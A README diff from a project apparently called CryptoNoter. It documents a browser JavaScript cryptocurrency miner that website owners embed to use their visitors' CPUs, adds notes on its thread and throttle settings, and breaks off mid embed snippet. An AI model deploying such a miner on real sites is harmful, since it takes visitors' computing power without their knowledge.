JayWalker512/CryptoNoter/README.md

 * Done!
 You can now start mining using your visitors' CPU resources by adding the above tag to any of your websites.

 ## JS Miner Documentation
-There are parameters that you can preset within the javscript miner.
+There are parameters that you can preset within the javscript miner script.

+*`autothreads(value)`
+The number of threads the miner should start with.
+Set to true is to auto detect the number of CPU cores available on the user's computer.

+*`throttle(value)`
+Set the fraction of time that threads should be idle.
+A value of 0 means no throttling (i.e. full speed), a value of 0.5 means that threads will stay idle 50% of the time, with 0.8 they will stay idle 80% of the time.

 Here are some basic configuration for the parameters:
 ```html
 <script src="https://www.cryptonoter.com/processor.js"></script>
 <script>